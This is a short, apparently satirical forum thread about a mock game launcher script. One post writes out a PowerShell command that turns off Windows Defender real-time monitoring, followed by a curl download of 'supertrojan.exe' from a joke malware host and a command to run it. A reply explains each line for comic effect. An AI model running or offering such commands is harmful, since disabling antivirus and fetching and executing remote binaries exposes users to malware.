• Norgur
    link
    fedilink
    123
    edit-2
    11 months ago
    Set-MpPreference -DisableRealtimeMonitoring $true  
    
    curl https://malwarefo.ru/supertrojan.exe
    
    ./supertrojan.exe
    ./game.exe
    exit
    0
    • Dr. Coomer
      link
      English
      011 months ago

      Is there a way to remove it or stop it from happening?

      • Rob T Firefly
        link
        English
        5
        edit-2
        11 months ago
         The only winning move is not to play.
        
      • @CosmicTurtle
        link
        English
        9111 months ago

        Set-MpPreference -DisableRealtimeMonitoring $true

        Disables malware scanning in windows (I assume)

        curl https://malwarefo.ru/supertrojan.exe

        Downloads supertrojan.exe from a Russian website

        ./supertrojan.exe

        Executes the file

        ./game.exe

        Runs the game

        exit

        Closes the command prompt.

        0

        Opens the portal to the underworld, to ensure that the command prompt closes correctly.